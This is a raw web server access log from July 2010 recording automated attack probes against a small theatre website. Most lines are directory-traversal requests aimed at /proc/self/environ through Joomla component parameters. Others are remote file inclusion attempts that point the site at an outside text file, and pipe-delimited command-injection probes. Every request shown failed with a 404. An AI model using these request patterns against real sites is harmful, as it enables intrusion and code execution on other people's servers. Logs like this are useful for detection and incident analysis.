188.165.217.175 - - [30/Jul/2010:22:08:23 -0700] "GET /logs/access_100720.log/indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.villageplayers.org"
188.165.217.175 - - [30/Jul/2010:22:08:59 -0700] "GET /logs/access_100720.log/indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.villageplayers.org"
94.23.215.207 - - [30/Jul/2010:22:11:49 -0700] "GET /logs/access_100720.log/indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.villageplayers.org"
94.23.215.207 - - [30/Jul/2010:22:18:50 -0700] "GET /indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "villageplayers.org"
94.23.215.207 - - [30/Jul/2010:22:20:02 -0700] "GET /indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.villageplayers.org"
94.23.215.207 - - [30/Jul/2010:22:20:07 -0700] "GET /indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "villageplayers.org"
94.23.215.207 - - [30/Jul/2010:22:20:54 -0700] "GET /indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "villageplayers.org"
94.23.215.207 - - [30/Jul/2010:22:21:28 -0700] "GET /indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.villageplayers.org"
94.23.215.207 - - [30/Jul/2010:22:21:31 -0700] "GET /indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "villageplayers.org"
213.186.117.208 - - [30/Jul/2010:22:21:47 -0700] "GET /delete_comment.php?board_skin_path=http://milowfan.com/files/ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.villageplayers.org"
213.186.117.208 - - [30/Jul/2010:22:21:47 -0700] "GET /logs/access_100319.log%20%20//delete_comment.php?board_skin_path=http://milowfan.com/files/ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.villageplayers.org"
213.186.117.208 - - [30/Jul/2010:22:21:47 -0700] "GET /logs//delete_comment.php?board_skin_path=http://milowfan.com/files/ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.villageplayers.org"
213.186.117.208 - - [30/Jul/2010:22:21:47 -0700] "GET /delete_comment.php?board_skin_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.villageplayers.org"
213.186.117.208 - - [30/Jul/2010:22:21:47 -0700] "GET /logs/access_100319.log%20%20//delete_comment.php?board_skin_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.villageplayers.org"
213.186.117.208 - - [30/Jul/2010:22:21:47 -0700] "GET /logs//delete_comment.php?board_skin_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.villageplayers.org"
208.43.99.195 - - [30/Jul/2010:22:22:27 -0700] "GET /index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "villageplayers.org"
208.43.99.195 - - [30/Jul/2010:22:22:28 -0700] "GET /index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "villageplayers.org"
195.199.197.169 - - [30/Jul/2010:22:24:06 -0700] "GET /delete_comment.php?board_skin_path=http://milowfan.com/files/ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.villageplayers.org"
195.199.197.169 - - [30/Jul/2010:22:24:06 -0700] "GET /logs/access_100319.log%20%20//delete_comment.php?board_skin_path=http://milowfan.com/files/ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.villageplayers.org"
195.199.197.169 - - [30/Jul/2010:22:24:06 -0700] "GET /logs//delete_comment.php?board_skin_path=http://milowfan.com/files/ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.villageplayers.org"
195.199.197.169 - - [30/Jul/2010:22:24:06 -0700] "GET /delete_comment.php?board_skin_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.villageplayers.org"
195.199.197.169 - - [30/Jul/2010:22:24:06 -0700] "GET /logs/access_100319.log%20%20//delete_comment.php?board_skin_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.villageplayers.org"
195.199.197.169 - - [30/Jul/2010:22:24:06 -0700] "GET /logs//delete_comment.php?board_skin_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.villageplayers.org"
94.23.215.207 - - [30/Jul/2010:22:24:19 -0700] "GET /indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.villageplayers.org"
94.23.215.207 - - [30/Jul/2010:22:24:50 -0700] "GET /indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.villageplayers.org"
208.43.99.195 - - [30/Jul/2010:22:25:58 -0700] "GET /logs/access.log//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "villageplayers.org"
208.43.99.195 - - [30/Jul/2010:22:25:58 -0700] "GET /index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "villageplayers.org"
208.43.99.195 - - [30/Jul/2010:22:25:58 -0700] "GET /logs//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "villageplayers.org"
208.43.99.195 - - [30/Jul/2010:22:26:03 -0700] "GET /logs/access.log//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "villageplayers.org"
208.43.99.195 - - [30/Jul/2010:22:26:03 -0700] "GET /index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "villageplayers.org"
208.43.99.195 - - [30/Jul/2010:22:26:03 -0700] "GET /logs//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "villageplayers.org"
94.23.215.207 - - [30/Jul/2010:22:27:11 -0700] "GET /logs/access.log//indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.villageplayers.org"
94.23.215.207 - - [30/Jul/2010:22:27:12 -0700] "GET /indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.villageplayers.org"
94.23.215.207 - - [30/Jul/2010:22:27:12 -0700] "GET /logs//indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.villageplayers.org"
94.23.215.207 - - [30/Jul/2010:22:27:21 -0700] "GET /logs/access_100715.log//indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.villageplayers.org"
188.165.217.175 - - [30/Jul/2010:22:29:31 -0700] "GET /logs/access.log//indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "villageplayers.org"
188.165.217.175 - - [30/Jul/2010:22:29:31 -0700] "GET /indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "villageplayers.org"
188.165.217.175 - - [30/Jul/2010:22:29:31 -0700] "GET /logs//indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "villageplayers.org"
94.23.215.207 - - [30/Jul/2010:22:29:36 -0700] "GET /indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "villageplayers.org"
188.165.217.175 - - [30/Jul/2010:22:29:47 -0700] "GET /logs/access.log//indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "villageplayers.org"
188.165.217.175 - - [30/Jul/2010:22:29:47 -0700] "GET /indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "villageplayers.org"
188.165.217.175 - - [30/Jul/2010:22:29:48 -0700] "GET /logs//indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "villageplayers.org"
94.23.215.207 - - [30/Jul/2010:22:29:51 -0700] "GET /indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "villageplayers.org"
94.23.215.207 - - [30/Jul/2010:22:30:44 -0700] "GET /indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.villageplayers.org"
94.23.215.207 - - [30/Jul/2010:22:30:54 -0700] "GET /indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.villageplayers.org"
94.23.215.207 - - [30/Jul/2010:22:31:09 -0700] "GET /indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.villageplayers.org"
94.23.215.207 - - [30/Jul/2010:22:31:15 -0700] "GET /indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.villageplayers.org"
92.43.201.28 - - [30/Jul/2010:22:32:22 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.villageplayers.org"
92.43.201.28 - - [30/Jul/2010:22:32:23 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.villageplayers.org"
92.43.201.28 - - [30/Jul/2010:22:32:23 -0700] "POST /logs/access_100720.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.villageplayers.org"
188.165.217.175 - - [30/Jul/2010:22:32:43 -0700] "GET /logs/access.log/indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "villageplayers.org"
188.165.217.175 - - [30/Jul/2010:22:32:44 -0700] "GET /indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "villageplayers.org"
188.165.217.175 - - [30/Jul/2010:22:32:44 -0700] "GET /logs/indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "villageplayers.org"
188.165.217.175 - - [30/Jul/2010:22:32:57 -0700] "GET /logs/access.log/indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "villageplayers.org"
188.165.217.175 - - [30/Jul/2010:22:32:57 -0700] "GET /indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "villageplayers.org"
188.165.217.175 - - [30/Jul/2010:22:32:57 -0700] "GET /logs/indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "villageplayers.org"
188.165.217.175 - - [30/Jul/2010:22:33:46 -0700] "GET /logs/access.log//indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "villageplayers.org"
188.165.217.175 - - [30/Jul/2010:22:33:46 -0700] "GET /indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "villageplayers.org"
188.165.217.175 - - [30/Jul/2010:22:33:46 -0700] "GET /logs//indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "villageplayers.org"
188.165.217.175 - - [30/Jul/2010:22:33:46 -0700] "GET /logs/access.log//indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "villageplayers.org"
188.165.217.175 - - [30/Jul/2010:22:33:46 -0700] "GET /indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "villageplayers.org"
188.165.217.175 - - [30/Jul/2010:22:33:47 -0700] "GET /logs//indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "villageplayers.org"
94.23.215.207 - - [30/Jul/2010:22:35:48 -0700] "GET /logs/access.log//indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "villageplayers.org"
94.23.215.207 - - [30/Jul/2010:22:35:49 -0700] "GET /indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "villageplayers.org"
94.23.215.207 - - [30/Jul/2010:22:35:49 -0700] "GET /logs//indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "villageplayers.org"
94.23.215.207 - - [30/Jul/2010:22:36:50 -0700] "GET /logs/access_100720.log//indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.villageplayers.org"
94.23.215.207 - - [30/Jul/2010:22:36:50 -0700] "GET /indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.villageplayers.org"
94.23.215.207 - - [30/Jul/2010:22:36:50 -0700] "GET /logs//indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.villageplayers.org"
94.23.215.207 - - [30/Jul/2010:22:37:28 -0700] "GET /logs/access.log//indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "villageplayers.org"
94.23.215.207 - - [30/Jul/2010:22:37:28 -0700] "GET /indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "villageplayers.org"
94.23.215.207 - - [30/Jul/2010:22:37:29 -0700] "GET /logs//indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "villageplayers.org"
94.23.215.207 - - [30/Jul/2010:22:38:23 -0700] "GET /logs/access.log//indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.villageplayers.org"
94.23.215.207 - - [30/Jul/2010:22:38:23 -0700] "GET /indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.villageplayers.org"
94.23.215.207 - - [30/Jul/2010:22:38:23 -0700] "GET /logs//indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.villageplayers.org"
94.23.215.207 - - [30/Jul/2010:22:38:43 -0700] "GET /logs/access_100715.log//indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.villageplayers.org"
91.121.141.186 - - [30/Jul/2010:22:39:07 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "villageplayers.org"
67.201.60.20 - - [30/Jul/2010:22:39:17 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "villageplayers.org"
94.23.215.207 - - [30/Jul/2010:22:40:58 -0700] "GET /logs/access_100715.log//indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.villageplayers.org"
94.23.215.207 - - [30/Jul/2010:22:40:58 -0700] "GET /indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.villageplayers.org"
94.23.215.207 - - [30/Jul/2010:22:40:59 -0700] "GET /logs//indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.villageplayers.org"
94.23.215.207 - - [30/Jul/2010:22:41:09 -0700] "GET /logs/access.log//indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "villageplayers.org"
94.23.215.207 - - [30/Jul/2010:22:41:09 -0700] "GET /indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "villageplayers.org"
94.23.215.207 - - [30/Jul/2010:22:41:09 -0700] "GET /logs//indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "villageplayers.org"
188.165.217.175 - - [30/Jul/2010:22:41:49 -0700] "GET /logs/access_100715.log/indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.villageplayers.org"
188.165.217.175 - - [30/Jul/2010:22:41:49 -0700] "GET /indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.villageplayers.org"
188.165.217.175 - - [30/Jul/2010:22:41:49 -0700] "GET /logs/indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.villageplayers.org"
94.23.215.207 - - [30/Jul/2010:22:41:51 -0700] "GET /logs/access_100525.log//indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.villageplayers.org"
94.23.215.207 - - [30/Jul/2010:22:41:51 -0700] "GET /indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.villageplayers.org"
94.23.215.207 - - [30/Jul/2010:22:41:51 -0700] "GET /logs//indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.villageplayers.org"
188.165.217.175 - - [30/Jul/2010:22:41:55 -0700] "GET /logs/access_100715.log/indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.villageplayers.org"
188.165.217.175 - - [30/Jul/2010:22:41:55 -0700] "GET /indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.villageplayers.org"
188.165.217.175 - - [30/Jul/2010:22:41:55 -0700] "GET /logs/indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.villageplayers.org"
208.43.99.195 - - [30/Jul/2010:22:43:08 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "villageplayers.org"
208.43.99.195 - - [30/Jul/2010:22:43:08 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "villageplayers.org"
194.109.162.5 - - [30/Jul/2010:22:44:57 -0700] "GET /delete_comment.php?board_skin_path=http://milowfan.com/files/ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.villageplayers.org"
194.109.162.5 - - [30/Jul/2010:22:44:57 -0700] "GET /logs//delete_comment.php?board_skin_path=http://milowfan.com/files/ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.villageplayers.org"
194.109.162.5 - - [30/Jul/2010:22:44:58 -0700] "GET /logs//delete_comment.php?board_skin_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.villageplayers.org"
194.109.162.5 - - [30/Jul/2010:22:44:58 -0700] "GET /delete_comment.php?board_skin_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.villageplayers.org"
194.109.162.5 - - [30/Jul/2010:22:44:59 -0700] "GET /logs/access_100319.log%20%20//delete_comment.php?board_skin_path=http://milowfan.com/files/ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.villageplayers.org"
194.109.162.5 - - [30/Jul/2010:22:44:59 -0700] "GET /logs/access_100319.log%20%20//delete_comment.php?board_skin_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.villageplayers.org"
91.121.141.186 - - [30/Jul/2010:22:46:24 -0700] "GET /logs/access.log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "villageplayers.org"
91.121.141.186 - - [30/Jul/2010:22:46:24 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "villageplayers.org"
91.121.141.186 - - [30/Jul/2010:22:46:25 -0700] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "villageplayers.org"
67.201.60.20 - - [30/Jul/2010:22:46:39 -0700] "GET /logs/access.log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "villageplayers.org"
67.201.60.20 - - [30/Jul/2010:22:46:39 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "villageplayers.org"
67.201.60.20 - - [30/Jul/2010:22:46:39 -0700] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "villageplayers.org"
213.186.117.208 - - [30/Jul/2010:22:54:20 -0700] "GET /write_update.php?board_skin_path=http://milowfan.com/files/ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.villageplayers.org"
213.186.117.208 - - [30/Jul/2010:22:54:20 -0700] "GET /logs/access_100628.log//write_update.php?board_skin_path=http://milowfan.com/files/ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.villageplayers.org"
213.186.117.208 - - [30/Jul/2010:22:54:20 -0700] "GET /logs//write_update.php?board_skin_path=http://milowfan.com/files/ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.villageplayers.org"
213.186.117.208 - - [30/Jul/2010:22:54:20 -0700] "GET /logs//write_update.php?board_skin_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.villageplayers.org"
213.186.117.208 - - [30/Jul/2010:22:54:20 -0700] "GET /write_update.php?board_skin_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.villageplayers.org"
213.186.117.208 - - [30/Jul/2010:22:54:20 -0700] "GET /logs/access_100628.log//write_update.php?board_skin_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.villageplayers.org"
94.23.215.207 - - [30/Jul/2010:22:58:37 -0700] "GET /logs/access.log//indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "villageplayers.org"
94.23.215.207 - - [30/Jul/2010:22:58:37 -0700] "GET /indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "villageplayers.org"
94.23.215.207 - - [30/Jul/2010:22:58:37 -0700] "GET /logs//indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "villageplayers.org"
113.30.66.24 - - [30/Jul/2010:23:00:48 -0700] "POST /logs/access_100722.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.villageplayers.org"
113.30.66.24 - - [30/Jul/2010:23:00:49 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.villageplayers.org"
